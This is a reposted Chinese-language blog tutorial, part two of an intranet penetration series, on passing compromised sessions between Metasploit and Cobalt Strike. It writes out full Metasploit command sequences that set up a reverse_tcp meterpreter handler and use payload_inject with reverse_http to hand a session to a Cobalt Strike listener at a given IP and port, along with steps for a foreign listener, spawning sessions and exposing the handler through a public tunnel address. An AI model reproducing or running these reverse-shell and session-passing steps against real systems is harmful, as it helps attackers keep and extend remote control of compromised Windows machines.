查看原文
其他

内网渗透(二) | MSF和CobaltStrike联动

安世加 2022-07-05

The following article is from 谢公子学安全 Author 谢公子

欢迎各位添加微信号:qinchang_198231  

 加入安全+ 交流群 和大佬们一起交流安全技术

MSF和CobaltStrike联动


目录

当获取了CobaltStrike类型的session后,想派生一个MSF类型的shell

当获取了MSF类型的session后,想派生一个CobaltStrike类型的shell



当获取了CobaltStrike类型的session后,想派生一个MSF类型的shell




在MSF上的操作:

use exploit/multi/handlerset payload windows/meterpreter/reverse_tcpset lhost 192.168.10.11set lport 4444exploit -j


在CobaltStrike上的操作

开启一个监听器Listener,HOST和PORT填我们MSF监听的地址(这里需要注意,如果我们的MSF也是在内网中的话,需要将MSF的端口映射到公网地址),这里我们将Kali的端口映射到了公网的 server.natappfree.cc:38615 (112.74.89.58:38615 )。如果我们的公网VPS上安装了MSF的话 ,就不需要映射端口了。

这里一定要注意,创建的Listener是foreign!

然后选中计算机,右键->Spawn,选择刚刚创建的监听器MSF,然后我们的MSF即可看到成功获取了meterpreter会话




当获取了MSF类型的session后,想派生一个CobaltStrike类型的shell



注:只有meterpreter类型的session才能派生给CS

我们现在获得了一个MSF的meterpreter类型的session,session id为1

首先在CobaltStrike上开启Listener,

然后在MSF中进行如下操作

use exploit/windows/local/payload_injectset payload windows/meterpreter/reverse_httpset DisablePayloadHandler true #默认情况下,payload_inject执行之后会在本地产生一个新的handler,由于我们已经有了一个,所以不需要在产生一个,所以这里我们设置为trueset lhost 48.94.225.140         #cobaltstrike监听的ipset lport 14444 #cobaltstrike监听的端口 set session 1 #这里是获得的session的idexploit

这样,我们的CobaltStrike上就可以收到MSF弹回来的session了。




内网渗透(一) | 搭建域环境
内网渗透 | 域内认证之Kerberos协议详解

您可能也对以下帖子感兴趣

文章有问题?点此查看未经处理的缓存